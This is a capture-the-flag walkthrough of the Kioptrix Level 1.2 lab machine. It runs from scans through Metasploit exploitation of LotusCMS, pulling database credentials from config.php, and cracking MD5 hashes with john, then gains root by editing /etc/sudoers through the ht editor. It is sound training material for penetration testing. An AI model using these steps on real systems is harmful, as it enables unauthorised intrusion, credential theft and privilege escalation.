Level 1.2

Kioptrix Level 1.2 (#3) Walkthrough

Enumeration

nmap

Start scanning the machine using nmap commands:

nmap -sC -sV -oA nmap/Level1.2 192.168.43.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 09:21 EDT
Nmap scan report for 192.168.43.176
Host is up (0.0046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:72:68:BE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

Then, I saw port 80 is open, let's put the IP to the browser and see what we got.

Dirb

dirb http://192.168.43.176

Got this output and galleryand phpmyadmincaught my eye!

First we navigate to the phpmyadmin and got a login form.

I manage to use the username administrator to login but nothing seems to be interesting pops up.

I navigate back to the login form and see what can I do from here.

Exploit

Tried SQL injection but had no luck, but I saw the login form is powered by LotusCMS, decided to use searchsploitto see what exploit we can find.

Found it ! Next, we can use msfconsoleto let us run the exploit.

type use exploit/multi/http/lcms_php_exec, then type show options

then set RHOST 192.168.43.176 to remote host IP

set URI to /

type runor exploit

Then type shell to get a shell from the meterpreter.

Then, we will get a proper shell by typing /bin/bash -i

Then, we need to locate a file called config.php

After cat the file and we got a lot of code, I manage to saw the login credentials for the myphpadmin login form.

After that, navigate to the gallery database and go to the dev_account table and we will find two users username and password in hash.

put it inside a text file and we type john --wordlists=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hash.txt

Then we will get the password for both users

dreg:mast3r

loneferret:starwars

Privilege Escalation

Then, we login to both users with ssh, I can't find anything interesting in dreg user, so maybe loneferret is the one that we want to access.

After logged into the account, then we cat the CompanyPolicy.README file and got this

When we type sudo ht, we got this

Then I type which ht and ls -l /usr/local/bin/ht and we know it is owned by root and it can be exploit by SUID rights.

Then we can type export TERM=xterm to get a graphical interface

then sudo ht and press F3 and navigate to /etc/sudoers

change to the loneferret ALL=NOPASSWD: ALL

Then, press F2 to save and F10 to quit

Type sudo su and you will get root

Or you can put /bin/bash at the end of the line

Then type sudo /bin/bash and you will get root!

Congratulation!

PreviousLevel 1.1NextLevel 1.3

Last updated